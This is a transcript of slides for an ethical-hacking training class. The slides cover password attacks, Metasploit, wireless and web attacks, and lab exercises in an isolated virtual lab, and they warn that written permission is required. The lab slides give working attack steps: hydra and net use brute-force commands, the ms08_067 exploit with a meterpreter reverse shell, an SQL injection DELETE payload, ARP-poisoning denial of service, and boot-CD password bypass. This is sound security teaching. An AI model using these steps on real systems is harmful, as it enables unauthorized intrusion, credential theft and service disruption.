Presentation is loading. Please wait.

Presentation is loading. Please wait.

 Strengths  Weakness  Security Interests  Something Fun 2.

Similar presentations

Presentation on theme: " Strengths  Weakness  Security Interests  Something Fun 2."— Presentation transcript:


2  Strengths  Weakness  Security Interests  Something Fun 2

3  Give students offensive knowledge to better defend computer networks  Hands-on security training to compliment theory, put theories into practice ◦ “Tell me and I'll forget; show me and I may remember; involve me and I'll understand.”  Knowledge sharing: the power of group learning 3

4  Group Exercise: What do you seen in the following pictures? 4

5  Increase experience with a multitude of security aspects  Network with other security-minded professionals  Play in a safe lab environment not offered at work or home  Earn CPEs to maintain certifications without high costs ◦ For CISSP  Preparing and presenting 2 hour presentation = 8 CPEs  Participating 1 hour = 1 CPE  Updating existing presentation (see ISC2 chart for specifics) 5

6  Have your questions answered, bring hard issues that require solutions  Improve public speaking and training skills 6

7 7 CEH Certified Ethical Hacker Study Guide CEH Certified Ethical Hacker Study Guide Kimberly Graves, 2010 Course Chapters: Chapter 1: Introduction to Ethical Hacking, Ethics, and Legality Chapter 2: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering Chapter 3: Gathering Network and Host Information: Scanning and Enumeration Chapter 4: System Hacking: Password Cracking, Escalating Privileges, and Hiding Files Chapter 5: Trojans, Backdoors, Viruses, and Worms Chapter 6: Gathering Data from Networks: Sniffers Chapter 7: Denial of Service and Session Hijacking Chapter 8: Web Hacking: Google, Web Servers, Web Application Vulnerabilities, and Web-Based Password Cracking Techniques Chapter 9: Attacking Applications: SQL Injection and Buffer Overflows Chapter 10: Wireless Network Hacking Wi-Fi and Ethernet Chapter 11: Physical Site Security Chapter 12: Hacking Linux Systems Chapter 14: Cryptography Chapter 15: Performing a Penetration Test

8  Class 1: Methodologies and Lab Setup  Class 2: Passive Information Gathering  Class 3: Active Information Gathering (Nessus)  Class 4: Target System Penetration  Class 5: Wireless and Wired Network Enumeration  Class 6: Privilege Escalation, Maintaining Access, and Malware  Class 7: Web Application Penetration  Class 8: Covering Tracks, IDS, Reporting, and Cleanup  Class 9: Metasploit  Class 10: Physical Security (Lock Picking etc.)  Class 11: Capture the Flag 8

9  System Hacking  Password Attacks  Remote Exploits via Metasploit  Web Application Penetration  Social Engineering Attacks  DoS Attacks  Exercises 9

10 DO NOT perform any activities from this course on any network/system or on a network connected device without proper permission! Make sure you have written permission and authorization to conduct these activities on any system. Conducting any activities related to penetration testing requires the consent of the owner of the target system and the internet service provider. Failure to obtain consent in the form of a legal contract can result in fines and imprisonment. 10

11 Information Systems Security Assessment Framework (ISSAF) 11

12  Kimberly Graves CEH Book 12

13  With a username/password combination, you can log in to the target via a running service  With only a username or password, use an online cracker  If both are unknown, use an online cracker, exploit code or an automated exploit tool  After gaining access to the target, secure the communications link and escalate user privileges for greater system access 13

14  Security depends highly on passwords and the ability to keep them secret.  Something you know  Importance of length and complexity  People write passwords down  Most people use the min required length 14

15  Passive Online  Active Online  Offline  Non Electronic 15

16  Sniffing ◦ Not detectable ◦ Capture the clear text or hash  Man in-the-middle ◦ Intercept authentication request and forward to server  Replay Attacks ◦ Capture and latter resend authentication packets ◦ Don’t have to know the password, just replay it. 16 Tools: Acquire clear-text passwords over the network using sniffing tools  ScoopLM, Ettercap, Cain and Able

17  Password Guessing  Use common default credentials ◦ Example user names: administrator, admin, sys, root ◦ Example passwords: password, oracle, etc.  Connect to a share ex. \\ip _address\c$, SSH, RDP, FTP, Etc.  Use automated tools/scripts  Using the reconnaissance info create targeted password lists based on high to low probability ◦ If min length is 8 don’t try password less than 8 ◦ Try most commonly used special char ex !, @, $ 17

18  A free, online, login-cracking tool that can attack many services  Uses a given username and password combination to brute force the service login  Use short username and password lists for best performance  Most useful for breaking into a system with a weak password or for which a username is known  hydra -l username -P password_list IP_address service 18

19  Create a simple username and password file using Windows Notepad. Save the file as credentials.txt.  Pipe this file using the FOR command to use the credentials.txt file to attempt to log on to the target system’s hidden share.  C:\> FOR /F “token=1, 2*” %i in (credentials.txt) do net use \\target\IPC$ %i /u: %j 19

20  Defenses: ◦ Two-factor authentication ◦ Account lockouts/max attempts ◦ Log/review brute force attempts  C:\windows\system32\config\Sec.Evt  /var/log or /var/log/lastlog ◦ Password change interval 20

21  Defenses: ◦ Creating strong passwords  1.Start with a memorable phrase, such as Maryhadalittlelamb  2. Change every other character to uppercase, resulting in MaRyHaDaLiTtLeLaMb  3. Change a to @ and i to 1 to yield  M@RyH@D@L1TtLeL@Mb  4. Drop every other pair to result in a secure repeatable password M@H@L1LeMb (this can easily be remade) 21 Do you have any other suggestions?

22  Usually requires physical access  Dump password file (shadow/SAM) ◦ C:\windows\system32\config vs. /etc/shadow  Types of Offline Password Attacks ◦ Dictionary ex. Experience ◦ Hybrid ex. Exper1ence ◦ Brute Force ex. !QAZxdr%16  Given enough time and processing power passwords can be cracked (Moore's Law) 22

23  Decrypt passwords stored in Windows SAM or Linux shadow files using dictionary, hybrid, brute-force, or rainbow table methods  John the Ripper, Cain and Abel, Ophcrack 23

24 24  A free, cross-platform, password-breaking tool that can break many different kinds of encryption  DES  MD5  Kerberos AFS  LM hash  Uses offline dictionary and/or brute force attacks to compare encrypted strings and find the password Dictionary Attack 24

25  Social Engineering  Shoulder Surfing  Dumpster Diving 25

26 26 -Software Keyloggers easily detected with anti-virus -Hardware keyloggers hard to detect

27  Easily analyze overall network security by scanning the network, identifying vulnerabilities, launching attacks, and creating a report in one step  Types of tools:  Source code assessment: application source code flaws  Application assessment: application runtime errors  System assessment: system or network configuration problems 27

28  Source code assessment tools can detect buffer overflows, possible privilege escalation, race conditions, and bad input  Rough Auditing Tool for Security (free)  Application assessment tools analyze runtime issues  AppDetective (commercial)  N-Stalker Web Application Security Scanner (free/commercial) 28

29  Explore vulnerabilities in system-level security measures  Nessus (free/commercial)  Retina (commercial)  Rapid7 (free/commercial) 29

30  Open source vulnerability assessment tool  Select exploit module  Configure the exploit  Select the payload  Launch the exploit  Contains console-based GUI and a command-line interface  Armitage  Find more exploit codes to use with or without Metasploit in online databases  30

31  Commercial GUI automated assessment and exploit tool  Contains all the steps of a pen test process from scanning to reporting and cleanup  Can return the target system to pre-attack state after a test 31

32 32

33  Exploit Pack ◦ Tool to easily create custom exploits and a new pentest tool competitor ◦ security.html security.html 33

34  Identify running services and operating systems by port scanning and fingerprinting  Find vulnerabilities  Find exploit code or sniff login information  Run the exploit against the target  Open a target shell on the attacking system  Identify the IP address and operating system of the target system  Choose an exploit from the database  Choose a payload  Choose an encoding method  Run the exploit against the target Manual Attack Metasploit Attack 34

35  WEP cracking can use one or two systems  One injects traffic and the other sniffs traffic from the victim  Aircrack is a tool that provides everything needed to crack WEP including:  Airodump — captures wireless packets  Aireplay — performs injection attacks  Aircrack — cracks WEP keys  Other tools:  THC-wardrive  WaveStumbler  Airsnarf  Airsnort  Airtraf  Omnipeek 35

36 Denial of Service  An attack that does not give the attacker access to the system, but makes the service unavailable to users by flooding the target with network packets  Types of wireless DoS attacks:  Authentication flood  Deauthentication flood  Network jamming  Equipment destruction 36

37  Finding vulnerabilities and exploiting them in the application  Allows access to data and even to the system  SQL Injection SELECT * FROM items WHERE owner = 'hacker' AND itemname = 'name'; DELETE FROM items; --' 37

38 38


40  Lab setup  Exercises 40

41 41  Host Operating System = Ubuntu (Linux)  Virtual Machine = Virtual Box  VM’s = Backtrack, Windows (Guest PC), XP-1, badstore  Each laptop has its own separate standalone lab environment  How to start the lab environment… 1) Open Virtual Box 2) Ensure that the Backtrack VM is powered on 3) Logon to Backtrack (root/toor) and type startx 4) Set the static IP address (.100) ifconfig eth3 netmask up 5) Ensure that the badstore VM has the badstore CD mounted and then start the VM 6) Configure the badstore VM IP address via the following command: ifconfig eth0 netmask up

42  In the following Scenario, you have already gathered as much information about your target as possible for planning the attack.  Your target is The company has hired you to confirm that their continuous monitoring program is working effectively. The administrators claim to have patched and hardened every machine. Now it is your job to see if any of the systems can be hacked. 42

43  Remotely access the application? ◦ Example: SQL Injection 43

44  Video 44

45  Remotely access the system via social engineering? ◦ Example: Malicious email (spear phishing) 45

46  Navigate to _Tools:_Social_Engineer_Toolkit_(SET) _Tools:_Social_Engineer_Toolkit_(SET)  Read the first paragraph introducing SET.  From the table of contents click on 3.1 Spear-Phishing Attack Vector and review how an example of how SET can be used.3.1 Spear-Phishing Attack Vector  Note: after gathering all the recon info, it is easy to use the SET to conduct computer based social engineering.  Or view the video: using-SET/Social-Engineering-Email-Attack-using-SET.html using-SET/Social-Engineering-Email-Attack-using-SET.html 46

47  Remotely access the system via network pentesting tools? ◦ Example: Metasploit or CoreImpact 47

48  From the Guest workstation:  Logon u=visitor p=qwerty  Open the Nessus client via the link on the desktop  From the reports tab, browse the internal network scan report  Click on “show filters”  Check “exploit exists”  Review the exploits that can be run against for high vulnerabilities ◦ MS08_067 48

49  Open a terminal in Backtrack and type:  msfconsole  How many exploits and payloads are available? ◦ 684 exploits and 217 payloads  Type: show ms08_067  When was the exploit disclosed and what is the ranking? ◦ Disclosed: 10/28/2008, Ranking: Great  To use the exploit type: ◦ use windows/smb/ms08_067_netapi ◦ set payload windows/meterpreter/reverse_tcp ◦ set lhost ◦ set rhost ◦ exploit 49

50  A meterpreter session will display. To show the meterpreter option type: help  We are going to start a command shell on the victim system  Type: execute -f cmd.exe -c –i  To confirm your on the victim system type: hostname  Note: with an admin user command shell the system is owned. If we did not have admin we would need to escalate privileges. 50

51  Next we will grab a screen capture of the victims screen ◦ To review the list of processes type: ps ◦ Note the windows explorer process id ◦ Migrate the explorer process id, example type: migrate 168 ◦ Next load and use meterpreter extension "espia" to enable capture on victim screen ◦ Type: use espia ◦ Run screengrab to start capturing victim screenshot ◦ Type: screengrab 51

52  From Backtrack open a terminal and type: armitage  Click the “start msf” button  It will take a few moments to load  Enter the attack computer IP in the dialog box:  From the menu bar  Hosts  Nmap scan  Intense scan  Enter range:  Watch the nmap output as the scan is running  When the scan completes, hit “ok”  In the search tool bar, type ms08_067  Double click the exploit, review the options, and click launch  If the exploit is successful, the icon will have lighting bolts and the console screen will report an open meterpreter session 52

53  Kill the meterpreter session, right click the victim  meterpreter  kill  What if we did not know what attack to use, we could use Armitage to show us available attacks ◦ From the menu  Attacks  Find Attacks  by vulnerability ◦ Choose “ok” on the dialog box. ◦ Rich click the target system  Attack  SMB  ms08_067  What if you wanted to automate the process or did not know what to exploit (Hailmary) ◦ From the menu  Attacks  Hailmary  by vulnerability ◦ Watch as the victim is auto owned 53

54  Now that you have a meterpreter session you could dump the hash, grab screen captures, run keyloggers etc.  Lets try a victim screen capture ◦ Rich click the vicitim  meterpreter  explore  screenshot 54

55  Video 55

56  Passively obtain passwords to remotely access the system? ◦ Example: Sniff Passwords 56

57  Right click “my computer”  services  Right click the “telnet” service change the startup type to automatic  Press the “start” button and then hit “ok”.  From a Backtrack terminal type: wireshark  From the interface list choose eth3  Open another terminal and type: telnet  Enter the username and password  Stop the running live capture and review it for credentials  Right click on a record containing telnet and choose “follow tcp stream”  Can you see the password in plan text? 57

58  From the guest pc, load start Cain and able from the desktop shortcut  Press the start/stop sniffing button and a dialog box will appear  Choose the network to sniff ( and press “ok”  From backtrack, open a terminal and type: telnet  Enter the username/password (ex. visitor/qwerty)  From the guest pc, click on the sniffer tab, and then click on the passwords tab  Right click on the recorded record to view the telnet credential information. 58

59  Ensure that badstore is up and running.  From the guest pc, open a web browser to: ◦  Click the login/register link  Create a new account  Go back to the Cain and able screen  Under the passwords tab, click on http  Note the username and password has been captured 59

60  Attempt remote logon? ◦ via online password attacks using hydra, scripts 60

61 1. We are going to try to get the account information of a user by brute- forcing an Telnet login. Open a command line terminal in BackTrack, type hydra and hit Enter to see the options 2. What options do we need to use to customize hydra to: 1.Input a login name? A file of login names? 2.Input a file of passwords? 3.Try the login name as the password? 4.Stop running after a login pair is found? 5.Limit the number of parallel tasks? 3. Use all the following options with the base command hydra –L users.txt –P passwords.txt telnet 1.Login name file: users.txt 2.Password file: passwords.txt 4. What login name/password combination was found? 61

62  Gain physical access to the system to logon? ◦ Example: Password cracking Live CD (Ophcrack), Konboot, Windows Ultimate Boot CD 62

63 1. From the VM settings menu for XP-1 place the konboot iso in the CD drive. 2. Reboot/boot XP-1 3. The konboot program will boot from the CD. Press enter when the initial konboot screen appears. 4. Once the windows operating system has finished loading you can log on with no password. 5. Click Administrator. Note: you accessed the machine with admin rights and no password. 63

64 1. From the VM settings menu for XP-1 place the Ophrack iso in the CD drive. 2. Reboot the XP-1 3. The Ophcrack program will boot from the CD 4. Choose the following options once the CD boots  Choose low RAM  Hit of for EN-English  Scroll to the bottom and choose US-USA  Choose screen of 1024x768x16  Now Ophcrack will auto load and start cracking passwords 64

65 Note: Stop the password cracking once you have cracked 3/5 passwords (~3 minutes) by choosing stop. 4. Record the usernames and passwords 5.Are there any passwords that did not get cracked…? If so, why do you think the password did not get cracked? ◦ Note: How short it took to crack the password and the importance of strong passwords. 65 Ophrack XP Rainbow Tables

66 6. Exit Ophcrack by pressing any key from the terminal window. Then press “Y” to shutdown the PC. 7. Remove Ophcrack from the CD drive. 8. Power on XP-1. 66

67  If konboot does not work, and your not able to get the passwords using Ophcrack, you will need to reset the password. 1. From the VM settings menu for XP-1 place the ubcd4.iso in the CD drive. 2. Reboot/boot XP-1 3. The Windows Ultimate Boot program will boot from the CD 4. At the welcome screen press enter to “launch” the ubcd program 5. On the preshell window press start shell or wait 3 seconds for it to auto run. 6. The network dialog window will appear, choose No, since you do not want to start the networking configuration. 67

68 7. When the o/s has finished booting open the password reset tool -start  programs  Password Tools  NTPWEdit 8. Press the “re-open” button -Note the users on the machine. The true built in admin account will have ID 500. 9.Select the true admin account and press the “change password” button. 10. Press the “save changes” button 11. Press the “exit” button 12. Shutdown XP-1 13. Remove ubcd4 from the VM CD drive on XP-1 14. Boot XP-1 and use the new password for the admin account 68

69  Remotely access the application?  Remotely access the system via social engineering?  Remotely access the system via network pentesting tools?  Obtain passwords to remotely access the system?  Attempt remote logon online password attacks?  Gain physical access to the system to logon?  When all else fails: ◦ Denial of Service 69 Failed

70  Verify that the badstore VM is up and running  From the guest pc, open a web browser to the badstore site: ◦ http://  From backtrack open a terminal and type: ettercap –G  From the menu  sniff  unified sniffing  Choose the network interface to use: eth3  From the menu  Hosts  scan for hosts  Press h to view the host list.  From the menu  Mitm  Arp poisoning  From the guest pc, open a web browser to the badstore site: ◦ http:// ◦ Note the website is not accessible from the guest pc 70

71  Video 71

72  After gaining initial access to the target system, it is necessary to keep going  Open a backdoor to maintain access  Hide traces of the break-in  Escalate privileges and attack other computers on the network with the victim as the attack source  Next class: Enumeration and Post Penetration  Questions? 72

73    Guide/dp/0470525207/ref=sr_1_1?s=books&ie=UTF8&qid=1323531433&sr=1-1 Guide/dp/0470525207/ref=sr_1_1?s=books&ie=UTF8&qid=1323531433&sr=1-1  Lab/dp/0470179864/ref=sr_1_1?s=books&ie=UTF8&qid=1323535901&sr=1-1 Lab/dp/0470179864/ref=sr_1_1?s=books&ie=UTF8&qid=1323535901&sr=1-1   Oceans 11 clip: Oceans 11 clip:  photos-go-online-in-new-archive-1825926.html?action=gallery&ino=6 photos-go-online-in-new-archive-1825926.html?action=gallery&ino=6        73

74    National Vulnerability Database (  Exploit-Database (  Securitytracker (  Securiteam (  Hackerstorm Vulnerability Research (  Hackerwatch (  SecurityFocus (  Security Magazine (  SC Magazine (   surveillance/ surveillance/   74

75  surveillance/ surveillance/    Sarah Palin             75

76       lkit_(SET) lkit_(SET)    metasploit-meterpreter/ metasploit-meterpreter/  sql injection  office space  core impact  76

77  PDF mapping tools to the different phases of Pen testing.  Review the list of tools and pick tools that you know and can demonstrate or that you would like to learn more about. 77 CEH Certified Ethical Hacker All-in-One Exam Guide

78  Social Engineering Toolkit  Maltego  Linux (Mike)  Snort  Wireshark  Nessus  Web Security (KB)  Crypto (KB)  Nmap  Metasploit 78

79 79 TBD

Download ppt " Strengths  Weakness  Security Interests  Something Fun 2."

Similar presentations

Ads by Google